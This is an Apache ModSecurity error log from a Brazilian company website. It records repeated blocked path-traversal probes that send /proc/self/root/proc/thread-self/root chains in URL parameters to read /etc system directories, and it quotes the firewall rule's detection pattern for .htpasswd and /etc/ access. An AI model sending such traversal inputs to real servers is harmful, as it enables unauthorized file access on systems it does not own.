[Thu Mar 19 04:59:38.340649 2026] [:error] [pid 19093:tid 140411616036608] [client 74.7.241.31:60256] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abus6V_V7PWP6ixUYl6MzgAAAo8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:59:38.464296 2026] [:error] [pid 14269:tid 140411733534464] [client 74.7.228.61:45226] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abus6gbLMZ6AikZjR9UuZAAAAAE"]
[Thu Mar 19 04:59:39.731080 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.241.31:41032] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abus68df6f5d65gmYZREXwAAAsU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:59:42.188997 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.241.31:41034] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abus7uyqAr6etmhZHNo0kgAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:59:43.539089 2026] [:error] [pid 27403:tid 140411674785536] [client 74.7.241.31:41044] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abus7xkFeYa1D6dYQnC_ZQAAAcg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:59:44.904754 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.241.31:41046] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abus8AkwaGbbGflqUZCGgwAAAMw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:59:46.244464 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.241.31:41052] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abus8vu8EFLIOrSqIptvSQAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:59:47.564139 2026] [:error] [pid 19093:tid 140411666392832] [client 74.7.241.31:53804] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abus81_V7PWP6ixUYl6M0wAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:59:51.558969 2026] [:error] [pid 27293:tid 140411658000128] [client 74.7.241.31:53810] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abus9_-YZRR_7pZ7nDJeVwAAA8o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:59:54.662689 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.243.128:54118] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/csh.login"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abus-uyqAr6etmhZHNo0nwAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:59:58.316174 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.241.31:53814] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abus_eyqAr6etmhZHNo0ogAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:59:58.324483 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.243.128:59700] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abus_gkwaGbbGflqUZCGiQAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:00:04.140518 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.241.31:51312] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutBOoXxyEfFpUF8f_htQAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:00:07.127593 2026] [:error] [pid 27293:tid 140411607643904] [client 74.7.241.31:51326] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutB_-YZRR_7pZ7nDJeYgAAA9A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:00:10.638353 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.243.128:43774] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutCvu8EFLIOrSqIptvWAAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:00:13.016571 2026] [:error] [pid 19093:tid 140411699963648] [client 74.7.243.128:49094] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutDV_V7PWP6ixUYl6M4wAAAoU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:00:16.453929 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.243.128:49098] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutEMdf6f5d65gmYZREagAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:00:19.708349 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.241.31:33358] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutEuoXxyEfFpUF8f_hyAAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:00:21.014212 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.241.31:36006] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutFcdf6f5d65gmYZREbgAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:00:22.331230 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.241.31:36014] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutFgkwaGbbGflqUZCGmQAAANU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:00:24.016323 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:49110] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutGNa6ubjKNq_cu4YTKQAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:00:25.399798 2026] [mime_magic:error] [pid 14269:tid 140411725141760] (70014)End of file found: [client 74.7.243.128:44156] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/lib
[Thu Mar 19 05:00:25.779185 2026] [:error] [pid 19093:tid 140411691570944] [client 74.7.241.31:36024] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutGV_V7PWP6ixUYl6M6wAAAoY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:00:25.887245 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.243.128:44158] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutGeoXxyEfFpUF8f_hygAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
